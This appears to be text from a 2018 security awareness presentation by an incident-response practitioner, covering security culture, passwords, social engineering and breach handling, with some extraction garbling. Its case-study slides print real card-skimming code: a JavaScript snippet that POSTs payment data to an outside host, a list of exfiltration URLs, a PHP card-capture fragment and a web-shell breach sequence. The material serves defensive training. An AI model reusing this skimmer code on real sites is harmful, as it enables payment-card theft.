4/30/18

1

Cyber Security – 25th April 2018

Alan Batey PCIP/PGCert Digital Forensics/B.AForensic and IR ManagerSecurity Risk Management Ltd

AgendaTo provide an overview of cyber security and the effects on today’s businesses:

- What is cyber security?

- Creating a culture around cyber security

- Data security measures

- Tips and best practice

What is cyber security?

4/30/18

2

Cyber Security is the collection of;

ü Actionsü Policiesü Trainingü Guidelinesü Best Practices

ü Security Conceptsü Technologiesü Safeguardsü Toolsü Risk management

Cyber Security Culture in business

Cybersecurity awareness links to Information security awareness

If you raise the awareness of employees information security responsibilities then you will eventually change the culture within an organisation.

It is also about making information security considerations an integral part of an employee’s job habits and conduct embedding them in their day-to-day actions

4/30/18

3

Data Security in today’s environment

Hunting was necessary to survive.

Making sure the good hunting areas were kept secret from other

clans was essential.

This ensured a plentiful supply of good food to

maintain life.

Security is not a new concept..

Not long after the invention of coins, we needed security to stop or at least easily identify

counterfeit ones.

Julius Caesar used the Shift by 3 rule when sending messages to his army to keep them secret from his enemies.

In WW2 the enigma device was used by the Germans to keep their troop movements and battle plans secret from the

British.

Security is not a new concept..

4/30/18

4

Pause for thought..

In cyberspace, we have created an environment in which we, as humans, have yet to evolve the native

senses to survive.

“We have anti-virus software, so we’re secure”“We have a firewall, so we’re secure”“The most serious threats come from the outside”“I don’t worry about security as I back up my data daily”“Responsibility for security falls under the IT team”

Common Security fallacies..

The core rules haven’t changedThe environment continues to changeWe all have the tools to surviveWe just need to engage them We need to adjust processes and behaviors

Keep calm and remember..

4/30/18

5

3 basic principles..

Con fid en tia lity

CIn tegrity

I

Availab ility

A

ü Protecting information from unauthorised disclosure

ü Protecting information from unauthorised modification.

ü Ensuring information is available to authorised users when it’s needed.Yet a great deal of mystery and intrigue still

surrounds Information Security!

A security analogy..

Imagine driving with no traffic laws and the chaos and danger for drivers and

pedestrians!

Information security management and policies provide the same type of protection for systems and users that traffic laws provide for drivers and pedestrians; Safer for the individual, beneficial for everyone!

A car, for example..

Security is like the brakes on your car; their function is to slow you down..

However their purpose is to allow you to go fast!

4/30/18

6

The way it used to be..

One way in! One entrance to protect!

The way it is now..

Many ways in! Many entrances to protect!

So, what is a cyber security policy?

Information Security Policy sets out users day-to-day security responsibilities

It relates to all employees, contractors and consultants

It dictates how sensitive information must be looked after

It is your responsibility to protect business information and know how it affects you

4/30/18

7

How does it affect me?

The problem..

“It won’t affect me”“Too expensive”

Not recognising the cyber security vulnerability threatNot understanding the potential impact

Some stats..

80% of crime to businesses is now cyberAttacks are very methodical and preciseSME’s are the most targeted

Commonly preventable; things such as anti-virus updates, lack of internal policy, process and procedures

On average, for every £40,000 lost per breach, only £1000 is recovered

4/30/18

8

Infosecurity threats

MalwareHacking&Denialof

ServiceAttacks Spyware

PhishingIdentityTheft Misuse

Malware – basic steps of a breach

Discover an unpatched CMS application

Upload a web shell on the server, providing a backdoor and access

Escalates privileges to fully compromise the web server and payment application.

Modifies the payment application code to collect payment card information as it is processed and dumps it into a file.

Uses the web shell to extract the payment card dumps.

8 out of 10 breaches we investigate are based on the Magento CMS

Magento is the most popular CMS

4/30/18

9

* Return data for Centinel validation** @ return Varien_Object*/

public function getCentinelValidationData(){

$info = $this->getInfoInstance();$params = new Varien_Object();$params

->setPaymentMethodCode($this->getCode())->setCardType($info->getCcType())->setCardNumber($info->getCcNumber())->setCardExpMonth($info->getCcExpMonth())->setCardExpYear($info->getCcExpYear())->setAmount($this->_getAmount())->setCurrencyCode($this->_getCurrencyCode())->setOrderNumber($this->_getOrderId());

return $params;}

/*** Store when success** @ return bool*/

private function _storeInfos($file = '/var/www/vhosts/ecommercesite.com/httpdocs/media/catalog/product/1/7/1678.pu_1.jpg'){

EMAILED TO SOUTH KOREA

Name17678.puSize178KB

Name17678.pu_1Size236KB

Image hacking

Cut and paste

C.cardnumber,c.expiration,c.seqcode,c.cardHolder,s.address,s.city,s.stateCode,s.zip,s.digitalemailtextFROM dbo.creditCards C, dbo.orders SWHERE C.[idOrder] = S.[idOrder].

Card holder data from this location was then saved in four files on the desktop named 2014.txt, 2015.txt, csv1 and Desktop.zip

Copied out to two external websites pastie.org and defuse.ca

Emailed to xxxxx@safemail.net

4/30/18

10

Javascript – shoplift vulnerability

var cc = new RegExp(\"[09]{13,16}\");\r\nvar asd=\"0\";\r\n if(cc.test(snd)){\r\nasd=\"1\" ;\r\n}\r\nvar http = new XMLHttpRequest();\r\nhttp.open(\"POST\",\"https://antaras.xyz/jquery.php\",true);\r\nhttp.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\");\r\nhttp.send(\"data=\"+snd+\"&asd=\"+asd+\"&id_id=ecommercesite.co.uk\");\r\nconsole.clear();\r\n }\r\n snd=null;\r\n setTimeout(\'send()\', 150);\r\n}\r\n// ]]></script>','2014-11-11 05:04:41','2015-07-27 16:48:03',

Javascript – shoplift vulnerability

1860https://ownsafety.org/opp.php390http://ownsafety.org/opp.php309https://useagleslogistics.com/gates/jquery.php100https://redwiggler.org/wp-content/themes/jquerys.php70https://clickvisits.biz/xrc.php28https://gamula.eu/jquery.php23https://gamula.ru/order.php22https://news-daily.me/gt/20https://antaras.xyz/jquery.php17https://clicksale.xyz/xrc.php10https://ausfunken.com/service/css.php9http://www.dobell.com/var/extendware/system/licenses/encoder/mage_ajax.php5https://redwiggler.org/wp-content/themes/jquery.php1/js/index.php1/js/am/extensions/sitemap_api.php1https://infopromo.biz/lib/jquery.php1https://google-adwords-website.biz/gates/jquery.php

Email

Email should be used for business purposes only with incidental limited personal use

Be careful of incoming emails from unknown persons, as they may contain viruses

Do not send anything inappropriate

Misuse of e-mail may also amount to racial/sexual harassment/bullying or victimisation. Even jokes and general office banter, which some people find amusing, may cause offence to others. Therefore, care should be taken when sending items such as chain letters, junk mail and jokes

The use of the Internet based e-mail is expressly forbidden

4/30/18

11

Passwords

You are responsible for keeping your company user account secure. Passwords must NEVER be disclosed to anyone. You must not log in as another user when logging into the computer systemDo not write your password downDo not share your password with othersChange your password if you think someone else knows it

What is a strong password?Think of a sentence that you can remember:

“British summers are the best”

Use the first few letters of each word to create a made up word:“brsumatb”

Add some complexity: “BrsUmatb” – add a Mix of CAPS & lower case.Substitute characters with numbers and symbols: “Br$Um4tb” – change ‘s’ to ‘$’ and change ‘a’ to ‘4’.

Over to you - Try to work out a ‘Strong Password’ for yourself. Practise this technique, you can also use it at home and for other things for which you need to remember an important password.Never use any dictionary words, acronyms, birthdays, sequential numbers, family names, football teams, dates, etc. – they are easily guessed!

Stealing passwords..

• socialengineeringe.g.phishing;coercion

• manualpasswordguessing,perhapsusingpersonalinformation‘cribs’suchasname,dateofbirth,orpetnames

• interceptingapasswordasitistransmittedoveranetwork

• ‘shouldersurfing’,observingsomeonetypingintheirpasswordattheirdesk

• installingakeylogger

• searchinganenterprise’sITinfrastructureforelectronicallystoredpasswordinformation

• brute-forceattacks;theautomatedguessingoflargenumbersofpasswordsuntilthecorrectoneisfound

• findingpasswordswhichhavebeenstoredinsecurely,suchashandwrittenorhiddenclosetodevice

• compromisingdatabasescontaininglargenumbersofuserpasswords,thencheckingforre-useofthese

4/30/18

12

What not to do..

Clear screen policy

Whenever you leave your desk, ALWAYS ‘lock’ your screen by pressing ‘Ctrl +Alt+ Delete’ and then select “Lock Workstation” and press ‘Enter’. You can also use “Windows Key” + “L” to lock your computer.

Upon your return you will be required to enter your password to unlock your machine. Only you will know this password.

If leaving your desk for any length of time, it may be more appropriate to consider logging out.

Social Engineering

“Amateurshacksystems,professionalshackpeople.”

4/30/18

13

Types of Social Engineering

Pretexting

The act of creating and using an invented scenario to persuade a targeted victim to release information or perform an action.

Types of Social Engineering

Phishing – Vishing – SMiShing

A technique of fraudulently obtaining private information.

Types of Social Engineering

A Favour For A Favour

Manipulating somebody to feel grateful and feel they owe the social engineer a favour.

4/30/18

14

Types of Social Engineering

Baiting

Just like a real world Trojan Horse that uses physical media and relies on the curiosity or greed of the victim.

Key takeaways

ü Be vigilant at all times

ü Don’t disclose your password

ü Make your passwords complex

ü Always lock your PC

ü Encrypt sensitive information

ü Keep a clear desk

ü Dispose of Company Information correctly

ü Delete suspicious emails

ü Do not download or install anything on your work’s PC

ü Be mindful of physical access/shoulder surfers

Key takeaways

ü Be vigilant at all times

ü Don’t disclose your password

ü Make your passwords complex

ü Always lock your PC

ü Encrypt sensitive information

ü Keep a clear desk

ü Dispose of Company Information correctly

ü Delete suspicious emails

ü Do not download or install anything on your work’s PC

ü Be mindful of physical access/shoulder surfers

4/30/18

15

What if we still have a breach?

Incident Management

Ensure you have detailed definitionsReact according to a plan regardless of whether the breach is the result of:

• An external intruder attack, or• Unintentional damage, or• A disgruntled employee

Each of the possible types of events, such as those listed above, should be detailed in advance by adequate contingency plans.

Incident Management

If there is limited attention given to how to handle an incident or a hasty decision-making process, the following may result:

Difficulty in:• tracking down the incident source• collecting evidence• preparing for the recovery of the system, and • protecting the valuable data contained on the system

4/30/18

16

We all have a choice..

The cyber environment is now a core part of our reality. It may be invisible and intangible – but it is active and contested.

We have two choices – to participate as an active player – or to be exploited as a resource.

Summary

We can’t prevent every attack, but we can reduce the likelihood – and make sure that we can survive when it happens.

There are 2 types of company or organisation:Those who have been breachedThose who are about to be breached

Information security is a serious business.

NE14ToRcOFF33?T1m3f0R1unch!